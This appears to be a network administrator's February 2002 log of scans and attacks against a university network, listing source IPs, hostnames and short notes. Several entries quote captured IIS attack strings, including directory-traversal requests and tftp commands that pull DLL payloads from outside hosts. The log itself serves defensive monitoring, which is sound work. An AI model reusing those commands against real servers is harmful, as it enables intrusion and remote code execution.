Short summary of some of the attacks against us for Feb. 2002

year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes

2002/02/01-05:44:20.17 195.92.95.61 (ariston.netcraft.com) scannet for port 80
2002/02/01-18:32:34 210.178.40.3 (Korea crap) scannet for port 22
2002/02/01-23:23:59.35 24.240.23.42 (24-240-23-42.hsacorp.net) scannet for port 80
2002/02/02-00:07:47.30 164.58.10.124 (cf4.onenet.net) scannet for port 80
2002/02/02-01:30:14.69 207.106.130.37 (Net Access,PA,US) scannet with ping
2002/02/02-03:16:20.77 203.43.135.225 (baysid10.baysidegrp.com.au) scannet for port 6112,1524,21,515
2002/02/02-03:16:38.44 200.193.77.164 (adsl-jve-164-a.brt.telesc.net.br) buff overflow attack port 6112 on multiple machines.
2002/02/02-03:24:27.38 213.11.84.1 (france) scannet for port 80
2002/02/02-05:22:41.38 210.200.145.209 (dial1479-nk.hitron.net) scannet for port 3128,8080,8000
2002/02/02-05:27:09.80 210.200.145.209 (dial1479-nk.hitron.net) scannet for port 8080
2002/02/02-10:19:42 64.45.60.77 (NETlimited,CA,US) scannet for port 22
2002/02/02-12:53:00.13 210.200.142.146 (dial654-nk.hitron.net) scannet for port 8080,8000,3128
2002/02/02-15:24:13.40 172.176.29.185 (ACB01DB9.ipt.aol.com) scannet for port 21
2002/02/02-15:33:53 200.221.91.38 (200-221-91-38.dsl-sp.uol.com.br) scannet for port 22
2002/02/02-15:52:57.87 206.153.70.149 (chris.odigi.com) scannet w/ 1 packet to high num port per ip. slow scan
2002/02/02-16:25:16 134.60.29.43 (mrm-43.e-technik.uni-ulm.de) scannet for port 22
2002/02/02-16:28:08.56 134.174.164.28 (hcnr.med.harvard.edu) buff overflow attack on sshd on 132.235.15.201
2002/02/02-16:57:09.17 208.41.56.210 (208-41-56-210.client.dsl.net) scannet for port 515
2002/02/02-17:15:18.87 172.176.29.170 (ACB01DAA.ipt.aol.com) scannet for port 21
2002/02/02-18:35:23.79 209.71.245.162 (bodyhosting.com) scannet w/ 1 packet to high num port per ip. slow scan
2002/02/02-18:40:05.79 210.200.144.43 (dial1059-nk.hitron.net) scannet for port 8080
2002/02/02-19:20:42 208.0.227.162 (Cable & Wireless,Saint John,An,AG) scannet for port 22
2002/02/02-19:39:48.55 213.61.26.6 (h-213.61.26.6.host.de.colt.net) scannet w/ 1 packet to high num port per ip. slow scan
2002/02/02-23:40:11.84 218.51.121.238 (Hanaro Telecom Co.,KR) scannet for port 21
2002/02/03-05:56:27.33 195.54.102.4 (ircu.bredband.com) scannet w/ 1 packet to high num port per ip. slow scan
2002/02/03-06:28:31.62 172.188.28.159 (ACBC1C9F.ipt.aol.com) scannet w/ 1 packet to high num port per ip. slow scan
2002/02/04-02:47:42.45 66.70.46.140 (HiSpeed Hosting,NJ,US) scannet w/ 1 packet to high num port per ip. slow scan
2002/02/04-06:05:12.33 66.70.46.140 (HiSpeed Hosting,NJ,US) scannet w/ 1 packet to high num port per ip,every 3 minutes
2002/02/04-06:21:05.14 198.186.203.48 (Dandelion Digital-cvs.kde.org) scannet w/ 1 packet to high num port per ip, 3-10 mins
2002/02/04-06:25:46.32 62.4.67.75 (NetGameZone.de) scannet w/ 1 packet to high num port per ip. slow scan
2002/02/04-06:34:29.37 62.4.67.102 (NetGameZone.de) scannet w/ 1 packet to high num port per ip. slow scan
2002/02/04-06:34:29.52 62.4.67.102 (NetGameZone.de) scannet for ports 1024, 3072
2002/02/04-07:15:10 132.235.234.235 (wasp.cns.ohiou.edu) scannet for port 137
2002/02/04-07:17:48 132.235.250.15:67 (pointer dhcp1.cns.ohiou.edu) scannet for port 58
2002/02/04-07:55:43.81 64.23.48.70 (SkyNetWEB,MD,US) 1. scannet w/ 1 packet to high num port per ip. slow scan
2002/02/04-07:55:43.81 64.23.48.70 (SkyNetWEB,MD,US) 2. reverse lookup of ip is owns.the.mafia.org.au
2002/02/04-10:08:24.05 66.24.145.229 (bgm-66-24-145-229.stny.rr.com) scannet for port 21
2002/02/04-10:11:29.74 24.128.16.33 (h00a0244c704c.ne.mediaone.net) scannet for port 21
2002/02/04-10:16:43 144.138.213.125:1564 (Telstra,CANBERRA, AU) scannet for port 25
2002/02/04-11:09:03 132.235.90.7 (some stupid OHIOU.EDU host) scannet for port 138,139,38293
2002/02/04-15:04:44.38 61.139.60.71 (CHINANET Sichuan province network) scannet w/ 1 packet to high num port per ip. slow scan
2002/02/04-18:51:03.42 216.227.60.122 (rm-f.net) scannet w/ 1 packet to high num port per ip, 3-10 mins
2002/02/04-19:53:11.45 205.149.142.63 (www.sillslaw.com) scannet for port 21
2002/02/04-19:53:12.31 207.158.132.66 (bratwurst.coast.net) scannet for port 21
2002/02/04-20:10:56.27 217.136.153.9 (adsl-71945.turboline.skynet.be) scannet for port 21
2002/02/04-21:55:04.45 66.130.202.167 (modemcable167.202-130-66.que.mc.videotron.ca) scannet for port 21
2002/02/04-23:29:00.30 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) connect to 132.235.16.217 port 69
2002/02/04-23:30:07.76 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) scannet for port 80, code red attacks.
2002/02/05-02:04:25.75 129.71.103.10 (stude-nt.salem-teikyo.wvnet.edu) scannet for port 23
2002/02/05-04:15:31.75 172.160.250.164 (ACA0FAA4.ipt.aol.com) scannet w/ 1 packet to high num port per ip, every 3 minutes
2002/02/05-07:15:36.10 128.121.27.82 (narcoti.ca(Verio, Inc.)) scannet w/ 1 packet to high num port per ip, every 3 minutes
2002/02/05-07:57:02.01 66.24.145.229 (bgm-66-24-145-229.stny.rr.com) scannet for port 21
2002/02/05-07:57:02.15 24.128.16.33 (h00a0244c704c.ne.mediaone.net) scannet for port 21
2002/02/05-08:56:26.05 64.215.166.35 (Akamai Technologies/S.F.,MA.US) scannet w/ 1 packet to high num port per ip, every 3 minutes
2002/02/05-09:28:24 132.235.238.1 (admin.memaud.ohiou.edu) scannet for port 38293, 139
2002/02/05-10:04:43.74 204.152.186.58 (proxy8.monitor.dal.net) scan 132.235.2.111 for ports 3128,80,1080,8080
2002/02/05-13:12:10.12 172.129.136.47 (AC81882F.ipt.aol.com) pound on 132.235.3.246:6346 about 1k tries. to 2002/02/05-15:42:46.91
2002/02/05-13:50:19.53 157.238.46.35 (Verio, Inc.) scannet w/ 1 packet to high num port per ip, every 3 minutes
2002/02/05-15:55:25.04 172.155.207.170 (AC9BCFAA.ipt.aol.com) pound on 132.235.3.246:6346 till 2002/02/05-21:30:38.63
2002/02/05-22:57:52.50 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) attack IIS server w/cmds such as GET /scripts/roo.exe?/c+dir
2002/02/06-01:57:59.52 211.62.43.122 (korea crap) scannet for port 515
2002/02/06-03:32:31.86 205.238.235.70 (svcr-adsl-205-238-235-70.epix.net) scannet for port 515
2002/02/06-09:17:50.91 217.85.120.95 (pD955785F.dip.t-dialin.net) scannet for port 21
2002/02/06-09:28:41 132.235.238.1 (admin.memaud.ohiou.edu) scannet for ports 138,139,38293
2002/02/06-11:21:42.9 132.248.62.62 (fmvz62.veterin.unam.mx) 1. start of probes of web servers on net
2002/02/06-15:52:05.14 132.235.70.166 (dhcp-070-166.CNS.OhioU.Edu) attack multiple IIS server w GET /scripts/..%5c.. attacks
2002/02/06-16:10:51.6 131.211.67.101 (knagserver.geog.uu.nl) 1. attack IIS server on 132.235.16.101 w/ buff overflow cmd
2002/02/06-16:10:51.6 131.211.67.101 (knagserver.geog.uu.nl) 2. cmd.exe?/c+ping+-v+udp+-n+3000+-l+62000+-w+0+irc.win.va.us.xentonix.net
2002/02/06-16:50:52.18 211.207.15.12 (HANANET,KR) scannet for port 21, anon ftp attacks
2002/02/06-17:41:16.37 152.7.5.232 (trl3899rnt.rh.ncsu.edu) scannet for port 22
2002/02/06-20:41:17.34 172.175.97.195 (ACAF61C3.ipt.aol.com) pound on 132.235.3.246:6346 3x/min 2002/02/06-21:43:07.86
2002/02/06-22:42:31.01 132.248.62.62 (fmvz62.veterin.unam.mx) 2. attack IIS servers w/ buff overflow cmd
2002/02/06-22:42:31.01 132.248.62.62 (fmvz62.veterin.unam.mx) 3. tftp%20-i%20132.248.62.62%20GET%20Admin.dll%20c:\Admin.dll
2002/02/06-23:26:25.95 129.79.150.163 (Indiana University ,IN,US) scannet for port 80
2002/02/07-03:53:16.75 66.27.204.160 (sc-66-27-204-160.socal.rr.com) portscan 132.235.201.225
2002/02/07-05:10:57 24.160.75.130 (cs2416075-130.houston.rr.com) scannet for port 80
2002/02/07-06:49:26.23 195.22.39.156 (,EN-DATA spol. s r.o.,Plzen,CZ) scannet for port 21,22,23
2002/02/07-10:38:48 12.111.51.212 (BPA INTERNATIONAL,CT,US) scan several machines for port 137
2002/02/07-11:06:05.05 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) scannet for port 80
2002/02/07-13:30:38.16 64.26.65.76 (admiral.soc.lib.md.us) scannet for port 111
2002/02/07-13:33:20 132.235.238.1 (admin.memaud.ohiou.edu) scannet for ports 138,139,38293
2002/02/07-14:30:26.41 132.235.62.224 (dhcp-062-224.cns.ohiou.edu) scannet for ports 137,139,445
2002/02/07-14:32:52.44 132.235.62.224 (dhcp-062-224.cns.ohiou.edu) probe 132.235.1.180 heavily
2002/02/07-14:56:26.60 212.65.0.164 (www.sveb.de) scannet for port 22
2002/02/07-21:33:38 132.235.238.1 (admin.memaud.ohiou.edu) scannet for ports 138,139,38293
2002/02/07-23:52:22.62 64.232.199.18 (ATHM-64-232-xxx-18.home.net) scannet w/ 1 packet to high num port per ip, every 3 minutes
2002/02/08-02:32:51.78 65.93.234.13 (Quebec-HSE-ppp3623060.sympatico.ca) scannet for port 21,anon ftp attacks
2002/02/08-07:18:03.81 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 for ports 8080, 1080 80 3128 23
2002/02/08-09:02:02.85 132.235.94.25 (another stupid OU address) scannet for port 31524(UDP) user sgjain@bobcat.ent.ohiou.edu
2002/02/08-09:10:32.39 210.9.198.22 (qua138728-2.gw.connect.com.au) unprovoked IPSEC security key connect? attack? query?
2002/02/08-11:50:07.19 132.235.47.5 (dhcp-047-005.cns.ohiou.edu) bang on port 389 on 132.235.1.[1,2]
2002/02/08-13:58:37.79 129.70.11.251 (University of Bielefeld,DE) scan several ips for port 2015, 1024
2002/02/08-19:42:42.71 217.225.222.167 (pD9E1DEA7.dip.t-dialin.net) scannet for port 21
2002/02/08-21:54:47.92 62.80.113.140:65000 (AboveNet, DE) scannet for port 3072,1024
2002/02/08-22:22:41.67 62.80.113.140 (AboveNet,DE) scan several ips for ports 1024,3072
2002/02/09-01:37:30.58 207.32.225.75 (status.elkhart.net) scannet for port 6112
2002/02/09-02:58:14.90 210.9.198.22 (qua138728-2.gw.connect.com.au) connect to 132.235.201.218 ports 80, 500
2002/02/09-05:22:33.84 212.187.98.97 (c98097.upc-c.chello.nl) 1. attack IIS servers w/buff overflow attack w/commands:
2002/02/09-05:22:33.84 212.187.98.97 (c98097.upc-c.chello.nl) 2. tftp.exe/?+-i+129.2.17.42+GET+JAsfv.dll+c:/recycler/_/_tmp/JAsfv.dll
2002/02/09-05:57:07.57 193.48.37.4 (test.ensait.fr) 1. ongoing attacks against hosts hit from 212.187.98.97
2002/02/09-05:57:07.57 193.48.37.4 (test.ensait.fr) 2. cmd: tftp.exe/?+-i+129.2.17.42+GET+acxro3.tmp+c:/recycler/_/_tmp/acxro3.tmp
2002/02/09-05:57:07.57 193.48.37.4 (test.ensait.fr) 3. cmd: tftp.exe/?+-i+151.198.183.48+GET+acxro3.tmp+c:/recycler/_/_tmp/acxro4.tmp
2002/02/09-05:57:07.57 193.48.37.4 (test.ensait.fr) 4. transfer data to/from 136.142.230.144 (itis-web.upj.pitt.edu)
2002/02/09-05:57:07.57 193.48.37.4 (test.ensait.fr) 5. transfer data to/from 136.142.230.135 (is.upj.pitt.edu)
2002/02/09-09:28:16.31 195.25.239.33 (haillan.sep-haillan.fr) scan part of net for port 22
2002/02/09-10:57:34.37 130.89.225.60 (cam047420.student.utwente.nl) hit 132.235.3.233 port 1250 5x/min til 2002/02/09-10:58:07.66
2002/02/09-12:02:03.14 128.112.37.137 (pku1.Princeton.EDU) zone transfer attempt from DNS
2002/02/09-12:04:29.72 128.112.37.137 (pku1.Princeton.EDU) scannet for port 21
2002/02/09-12:08:57.56 128.112.37.137 (pku1.Princeton.EDU) 1. anon ftp attacks w/ site exec buff overflows (/sbin/route command)
2002/02/09-12:08:57.56 128.112.37.137 (pku1.Princeton.EDU) 2. attack 132.235.1.2 every 3 secs till 2002/02/09-16:01:53.32
2002/02/09-13:24:52.52 200.206.211.44 (200-206-211-44.dsl.telesp.net.br) scannet for port 80
2002/02/09-16:04:12.35 128.112.37.137 (pku1.Princeton.EDU) 3. attack 132.235.2.2 every 3 secs till 2002/02/09-17:30:58.04
2002/02/09-16:44:50.13 64.232.199.18 (ATHM-64-232-xxx-18.home.net) scannet w/ 1 packet to high num port per ip to 11-04:26:51.36
2002/02/09-18:02:47.26 128.6.239.167 (rupc.rutgers.edu) scannet w/ 1 packet to high num port per ip to 2002/02/10-21:50:03.75
2002/02/09-19:19:03.63 195.184.183.60 (.columbus.rr.com) portscan 132.235.3.151
2002/02/09-20:01:30.21 172.188.28.159 (ACBC1C9F.ipt.aol.com) scannet w/ 1 packet to high num port per ip to 2002/02/11-02:07:32.60
2002/02/09-22:07:53.99 64.56.236.96 (static-b2-96.highspeed.eol.ca) scannet for port 21
2002/02/09-23:10:00.05 172.190.11.66 (ACBE0B42.ipt.aol.com) scannet w/ 1 packet to high num port per ip to 2002/02/11-02:46:24.69
2002/02/09-23:28:46.11 64.81.20.197 (dsl081-020-197.sea1.dsl.speakeasy.net) scannet for port 21
2002/02/09-23:33:50.36 64.81.20.197 (dsl081-020-197.sea1.dsl.speakeasy.net) buff overflow attacks on port 6112
2002/02/09-23:49:43.12 216.119.0.191 (JPS.Net,CA,US) scannet w/ 1 packet to high num port per ip
2002/02/09-23:54:36.28 65.25.33.25 (dhcp065-025-033-025.neo.rr.com) scannet for port 21
2002/02/10-00:37:32.95 64.56.236.96 (static-b2-96.highspeed.eol.ca) scannet for port 21
2002/02/10-13:48:27.50 80.247.203.72 (VRC,BE) scannet w/ 1 packet to high num port per ip to 2002/02/10-02:30:47.32
2002/02/10-13:54:00.68 200.181.88.180 (ppp180-bsace7009.telebrasilia.net.br) scannet for port 1433
2002/02/10-14:31:53.52 216.232.8.2:22 (a00e50wfb36ul.bc.hsia.telus.net) scannet for port 22
2002/02/10-17:39:15.96 172.155.21.114 (AC9B1572.ipt.aol.com) probe 132.235.3.246:6346 3x/min til 2002/02/10-18:40:13.65
2002/02/10-18:18:56.26 64.224.111.55 (Interland,GA,US) scannet w/ 1 packet to high num port per ip
2002/02/10-19:52:56.71 62.80.113.81 (AboveNet,DE) scannet w/ 1 packet to high num port per ip
2002/02/10-20:22:25.00 65.113.112.60 (NetFire.com,Dallas,TX,US) scannet w/ 1 packet to high num port per ip to 09-16:28:21.75
2002/02/10-22:51:49.79 66.75.117.126 (sc-66-75-117-126.socal.rr.com) attack ips on port 6346 til 2002/02/11-05:56:14.15
2002/02/11-00:01:18.79 24.208.181.225 (dhcp024-208-181-225.columbus.rr.com) portscan 132.235.3.151
2002/02/11-00:05:46.07 24.208.181.225 (dhcp024-208-181-225.,HU) scannet w/ 1 packet to high num port per ip
2002/02/11-00:05:46.07 24.208.181.225 (dhcp024-208-181-225.columbus.rr.com) portscan 132.235.17.1
2002/02/11-00:27:47.43 12.29.20.132 (msg.Sn00pDog.pentru.o.muie.biz(Yahoo.com)) scannet w/ 1 packet to high num port per ip
2002/02/11-00:52:02.28 65.32.129.136 (6532129hfc136.tampabay.rr.com) probe 132.235.2.103 ports 60000, 10009, 10008
2002/02/11-01:08:47.34 65.24.135.27 ( hcp065-024-135-027.columbus.rr.com) portscan 132.235.1.2
2002/02/11-02:19:29.38 209.141.42.248 (Neo Planet,AZ,US) scan part of net for port 22
2002/02/11-04:00:01.77 208.177.252.17 (O Communications,CA,US) scan part of net for port 22
2002/02/11-05:51:39.42 65.32.129.136 (6532129hfc136.tampabay.rr.com) probe 132.235.3.169 ports 60000, 10009, 10008
2002/02/11-06:00:13.03 172.190.11.66 (ACBE0B42.ipt.aol.com) scannet w/ 1 packet to high num port per ip
2002/02/11-06:09:43.09 12.29.20.132 (msg.Sn00pDog.pentru.o.muie.biz) scannet w/ 1 packet to high num port per ip
2002/02/11-06:28:00.36 65.100.231.34:0 (South Central Communications,UT,US) scannet for port 3072,1024
2002/02/11-06:54:00.56 172.188.28.159 (ACBC1C9F.ipt.aol.com) scannet w/ 1 packet to high num port per ip
2002/02/11-07:02:57.05 65.100.231.34 (South Central Communications,UT,US) scannet for ports 1024,3072
2002/02/11-08:01:02.54 24.82.56.168 (h24-82-56-168.vs.shawcable.net) connect to 132.235.3.0:7151 1 packet
2002/02/11-08:20:25.37 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 for ports 8080,3128,80,1080,23
2002/02/11-13:34:53.98 212.218.174.66 (computerra.fnni.de) scannet for port 22
2002/02/11-13:47:28.39 24.82.56.168 (h24-82-56-168.vs.shawcable.net) connect to 132.235.201.0:18971 1 packet
2002/02/11-14:23:31.93 66.28.11.70 (viper.nitro.net) scan 132.235.18.156 for ports 1080, 8080, 3128, 80 23, 9000
2002/02/11-15:35:57.99 24.82.56.168 (h24-82-56-168.vs.shawcable.net) connect to 132.235.3.0:17290 1 packet
2002/02/11-17:43:10.72 193.226.123.17 (teddy.ms.fx.ro) scannet w/ 1 packet to high num port per ip
2002/02/11-17:49:31.21 24.82.56.168 (h24-82-56-168.vs.shawcable.net) connect to 132.235.201.0:2570 1 packet
2002/02/11-18:02:24.63 172.128.32.226 (AC8020E2.ipt.aol.com) bang on 132.235.3.246:6346 3x/min till 2002/02/11-19:18:05.37
2002/02/11-18:37:49.37 217.136.2.73 (adsl-33353.turboline.skynet.be) scannet for port 21,anon ftp attack
2002/02/11-19:50:51.15 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.154 for ports 8080,3128,80,1080,23
2002/02/11-19:58:16.25 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.154 for ports 8080,3128,80,1080,23
2002/02/11-21:57:11.82 131.91.80.28 (trout.cse.fau.edu) portscan 132.235.17.1
2002/02/12-00:37:41.99 132.235.170.151 (dhcp-170-151.west-green.ohiou.edu) scannet for port 137
2002/02/12-00:38:11.89 132.235.170.151 (dhcp-170-151.west-green.ohiou.edu) probe 132.235.3.172 ports 445, 139, 137 80
2002/02/12-00:54:48.57 172.170.29.3 (ACAA1D03.ipt.aol.com) bang on 132.235.3.246:6346 3x/min till 2002/02/12-01:27:53.46
2002/02/12-01:55:15. 132.252.134.129 (www.ekt.uni-essen.de) scannet for port 22
2002/02/12-05:56:04.14 198.62.212.109 (Keebler Company,IL,US) scan net for port 80, IIS attacks til 2002/02/13-00:23:17.06
2002/02/12-05:56:04.14 216.81.175.169 (beeline169.beelinecolor.com) 1. scannet for port 80, IIS buff overflow attack 10 packets/sec
2002/02/12-05:56:04.14 216.81.175.169 (beeline169.beelinecolor.com) 2. plus probe port 137 till 2002/02/12-20:30:29.7
2002/02/12-06:28:17.11 172.188.28.159 (ACBC1C9F.ipt.aol.com) scannet w/ 1 packet to high num port per ip
2002/02/12-07:16:18.28 66.140.25.157 (ROBERT LEVIN Plano, TX,US) portscan 132.235.3.137 ports 23, 8080, 3128 1080t to 23:56:33.47
2002/02/12-08:20:53.19 80.143.203.56 (p508FCB38.dip.t-dialin.net) conn to 132.235.201.151:20000 8 packets
2002/02/12-10:22:08.34 205.247.210.146 (US Sprint,VA,US) scannet for port 80
2002/02/12-13:17:09.25 207.0.222.20:111 (badger2.badger.org) scannet for port 111
2002/02/12-13:17:11.44 207.0.222.79 (DATAPEX NETWORK SYSTEMS INET,FL,US) scannet for port 111
2002/02/12-14:23:29.19 62.12.114.151 (Menanet Communications,EG) try to login 132.235.1.252 multiple times w/ passwd=login
2002/02/12-14:28:52.72 211.43.165.212 (korea crap) attack 132.235.1.252 port 32772 buff overflow - cmsd, rstatd
2002/02/12-15:28:42.36 165.21.103.174:0 (chatterbox.singnet.com.sg) scan several ips for port 3072
2002/02/12-16:30:38.85 131.238.234.100:0 (lockhace-sec.students.udayton.edu) scan several ips for port 1024,3072
2002/02/12-17:11:24.31 213.107.243.105 (pc3-ipsw3-0-cust105.col.cable.ntl.com) scannet for port 21
2002/02/12-22:21:25.73 61.182.50.241 (CHINANET Hebei province network,CN) scannet for port 111+buff overflow attacks port 32785-statd
2002/02/13-05:05:57.94 66.123.162.34 (adsl-66-123-162-34.dsl.sntc01.pacbell.net) scannet for port 80
2002/02/13-05:05:58.03 66.123.162.34 (adsl-66-123-162-34.dsl.sntc01.pacbell.net) scannet for port 80
2002/02/13-05:08:14.48 66.123.162.34 (adsl-66-123-162-34.dsl.sntc01.pacbell.net) scannet for port 1214
2002/02/13-05:12:58.40 66.123.162.34 (adsl-66-123-162-34.dsl.sntc01.pacbell.net) scannet for port 1214
2002/02/13-05:47:26.96 172.191.182.180 (ACBFB6B4.ipt.aol.com) scannet for port 21
2002/02/13-11:48:59.99 217.128.125.141 (AToulouse-103-1-1-141.abo.wanadoo.fr) scannet for port 21,anon ftp attack
2002/02/13-12:19:41 132.235.90.7 (Gordy Hall. Ohiou.edu) scannet for port 38293
2002/02/13-12:21:37 132.235.90.7 (Gordy Hall. Ohiou.edu) scannet for port 38293
2002/02/13-16:06:56.20 130.39.51.48:0 (Louisiana State University) scannet for ports 1024,3072
2002/02/13-16:14:23.39 217.225.238.66 (pD9E1EE42.dip.t-dialin.net) scannet for port 21,anon ftp attack
2002/02/13-20:05:42.28 172.161.226.8 (ACA1E208.ipt.aol.com) bang on 132.235.3.246:6346 3x/min til 21:25:01.74
2002/02/13-20:16:30.32 4.33.209.212 (lsanca1-ar5-209-212.lsanca1.dsl.gtei.net) probe 132.235.3.46 ports 12345 27374 139
2002/02/13-21:41:41.19 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) code red attack against several ips
2002/02/13-21:46:59.54 172.128.169.179 (AC80A9B3.ipt.aol.com) bang on 132.235.3.246:6346 3x/min til 19:32:42.59
2002/02/13-21:58:07.43 132.235.125.231 (dhcp-125-231.cns.ohiou.edu) scan 132.235.3.169 port 5001
2002/02/13-23:34:40.75 172.128.169.179 (AC80A9B3.ipt.aol.com) bang on 132.235.3.246:6346 2x/min til 2002/02/14-01:36:32.84
2002/02/14-01:36:00.02 217.85.34.219 (pD95522DB.dip.t-dialin.net) bang on 132.235.3.37:6346 3x/min til 2002/02/14-08:31:21.59
2002/02/14-04:11:02 193.252.51.105 (AToulon-101-1-1-105.abo.wanadoo.fr) scannet for port 21
2002/02/14-04:11:03.46 193.252.51.105 (AToulon-101-1-1-105.abo.wanadoo.fr) scannet for port 21,anon ftp attack
2002/02/14-05:39:38.49 193.252.51.140 (AToulon-101-1-1-140.abo.wanadoo.fr) scannet for port 21,anon ftp attack
2002/02/14-05:40:02 193.252.51.140 (AToulon-101-1-1-140.abo.wanadoo.fr) scannet for port 21
2002/02/14-07:01:50.31 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 for ports 8080,3128,80,1080,23
2002/02/14-07:20:53 65.208.146.150 (UUNET Technologies) scannet for port 25
2002/02/14-14:44:53.22 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scan several ips for port 524
2002/02/14-14:53:22.80 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524
2002/02/14-15:25:13.97 204.152.186.58 (proxy8.monitor.dal.net) scan 132.235.4.219 for ports 23,80,81,1080,8080,3128
2002/02/14-18:15:03.45 172.147.136.25 (AC938819.ipt.aol.com) bang on 132.235.3.246:6346 2x/min til 2002/02/14-22:10:03.19
2002/02/14-22:39:31.41 217.128.46.172 (AMontpellier-101-1-2-172.abo.wanadoo.fr) scannet for port 21,anon ftp attack
2002/02/14-22:40:12.03 217.128.46.172 (AMontpellier-101-1-2-172.abo.wanadoo.fr) scannet for port 21
2002/02/14-23:55:45.93 24.240.101.252 (24-240-101-252.hsacorp.net) bang on 132.235.201.27:6346 15x/hr til 2002/02/15-04:42:50.98
2002/02/15-00:45:14.14 217.228.97.165 (pD9E461A5.dip.t-dialin.net) bang on 132.235.3.37:6346 11x til 2002/02/15-04:22:39.20
2002/02/15-02:08:30.55 66.75.117.126 (sc-66-75-117-126.socal.rr.com) probe port 6346 on 132.235.4.26
2002/02/15-04:42:52.89 198.62.212.109 (Keebler Company,IL,US) 1. scannet for port 80
2002/02/15-04:42:52.89 198.62.212.109 (Keebler Company,IL,US) 2. attack IIS w/ tftp%20-i%20132.252.30.155%20GET%20cool.dll%20e:\httpodbc.dll
2002/02/15-04:43:48.38 24.240.101.252 (24-240-101-252.hsacorp.net) bang on 132.235.201.27:6346 2x/min til 15:29:27.86
2002/02/15-04:52:35.92 217.228.97.165 (pD9E461A5.dip.t-dialin.net) conn to 132.235.3.37:6346 4x/min til 14:34:12.48
2002/02/15-05:42:02 66.100.217.67 (ICM Computers,MI,US) scannet for port 22
2002/02/15-08:18:10.70 66.20.146.112 (adsl-20-146-112.gsp.bellsouth.net) scan 132.235.18.94 port 27374, 12345, 139
2002/02/15-10:18:51.14 209.214.141.45 (host-209-214-141-45.jax.bellsouth.net) scannet for port 25
2002/02/15-10:28:01.42 210.112.236.9 (korea crap) scannet for port 22
2002/02/15-10:50:52.60 130.228.230.161 (proxy6.monitor.dal.net - Netcetera,DK) scan 132.235.19.185 ports 1080,80,3128,8080,71,80801,23
2002/02/15-10:56:55.15 204.152.186.58 (proxy8.monitor.dal.net-M.I.B.H., LLC,CA,US) scan 132.235.19.185 1080,80,3128,8080,71,80801,23
2002/02/15-16:58:32.32 172.172.198.43 (ACACC62B.ipt.aol.com) conn to 132.235.3.246:6346 4x/min til 21:26:38.64
2002/02/15-18:14:52.26 80.11.33.189 (AReims-101-1-5-189.abo.wanadoo.fr) scannet for port 21
2002/02/15-20:31:15.95 66.20.145.229 (adsl-20-145-229.mem.bellsouth.net) scan 132.235.19.6 port 27374, 12345, 139
2002/02/15-21:27:49.97 172.172.198.43 (ACACC62B.ipt.aol.com) conn to 132.235.3.246:6346 3x/min til 05:19:22.83
2002/02/15-22:04:06.74 80.135.11.116 (p50870B74.dip.t-dialin.net) conn to 132.235.3.37:6346 4x/min til 06:30:13.58
2002/02/15-23:02:34.53 66.20.145.229 (adsl-20-145-229.mem.bellsouth.net) conn to 132.235.3.217 ports 27374 12345 139
2002/02/16-01:47:35.05 4.61.33.207 (lsanca1-ar23-4-61-033-207.lsanca1.vz.dsl.gtei.net) start of anon ftp attacks on several ips
2002/02/16-02:34:50.08 4.61.33.207 (lsanca1-ar23-4-61-033-207.lsanca1.vz.dsl.gtei.net) start of netscan for port 80
2002/02/16-05:53:02.01 66.75.117.126 (sc-66-75-117-126.socal.rr.com) try to connect to 132.235.4.26 : 6346 til 19:43:17.09
2002/02/16-13:04:30.58 24.216.91.172 (24-216-91-172.hsacorp.net) conn to 132.235.201.27:6346 2x/min til 21:51:02.38
2002/02/16-13:26:46.71 62.211.173.171 (Telecom Italia,IT) conn to 132.235.3.32:6346 2x/min til 17:17:24.55
2002/02/16-16:35:59.26 217.228.241.189 (pD9E4F1BD.dip.t-dialin.net) conn to 132.235.201.211:6346 3x/min til 18:41:18.21
2002/02/16-19:29:25.70 131.118.94.98 (cslinux.frostburg.edu) scannet for port 6112,77
2002/02/16-19:29:25.75 131.118.94.98:6112 (cslinux.frostburg.edu) scannet for port 6112
2002/02/16-20:25:59.51 65.92.138.69 (HSE-Montreal-ppp335300.sympatico.ca) attack IIS server w/buff overflow attack.
2002/02/16-20:42:52.25 65.94.96.177 (MTL-HSE-ppp168379.qc.sympatico.ca) connect to 132.235.4.4 : 6346
2002/02/16-21:52:08.68 24.216.91.172 (24-216-91-172.hsacorp.net) conn to 132.235.201.27:6346 3x/min til 23:11:19.14
2002/02/16-22:01:36.55 131.118.94.98 (cslinux.frostburg.edu) 1. attack cde (port 6112) on multiple IPs w/buff overflow attack
2002/02/16-22:01:36.55 131.118.94.98 (cslinux.frostburg.edu) 2. server to be started on port 77 (rje)
2002/02/16-23:42:50.89 202.194.124.130 (Yantai University Library,Shandong,CN) scannet for port 111,buff overflow attacks -rstatd
2002/02/16-23:52:39.22 216.232.8.2 (a00e50wfb36ul.bc.hsia.telus.net) scannet for port 21
2002/02/17-04:56:01.44 63.217.10.114 (63-217-10-114.sdsl.cais.net) scannet for port 111
2002/02/17-07:30:19.77 217.172.160.3 (intergenia GmbH & Co. KG.,DE) scannet for port 22
2002/02/17-09:13:45.54 66.28.45.19 (Cogent Communications,Washington,DC,US) scannet for port 80
2002/02/17-13:22:18.83 172.167.180.216 (ACA7B4D8.ipt.aol.com) conn to 132.235.3.246:6346 3x/min til 02:06:41.67
2002/02/17-14:54:14.46 205.178.108.3 (RCN Corporation,Princeton,NJ,US) scannet for port 21
2002/02/17-18:39:00.61 66.75.117.126 (sc-66-75-117-126.socal.rr.com) try to connect to 132.235.4.26 : 6346 til 23:06:43.09
2002/02/17-19:23:12.93 132.235.166.25 (dhcp-166-025.east-green.ohiou.edu) portscan 132.235.16.100
2002/02/17-22:13:30.59 136.145.57.66 (University of Puerto Rico,PR) scannet for port 6112
2002/02/18-01:45:45.36 12.234.132.150 (12-234-132-150.client.attbi.com) scannet for port 80
2002/02/18-01:46:04.09 12.234.132.150 (12-234-132-150.client.attbi.com) scannet for port 80
